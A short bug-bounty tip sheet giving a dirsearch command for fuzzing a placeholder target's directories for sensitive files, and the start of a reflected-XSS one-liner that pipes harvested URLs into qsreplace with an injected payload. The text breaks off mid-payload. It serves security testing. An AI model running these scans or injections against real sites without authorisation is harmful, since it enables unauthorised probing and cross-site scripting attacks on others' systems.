# Writeups (Golden tips) ## Information Disclosure ```bash # directory fuzzing for sensitive files dirsearch -u “https://target.com” -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent ``` ## Reflected XSS (Non-Persistent XSS) ```bash # XSS one liner echo "target.com" | gauplus | grep "?" | qsreplace 'xssz">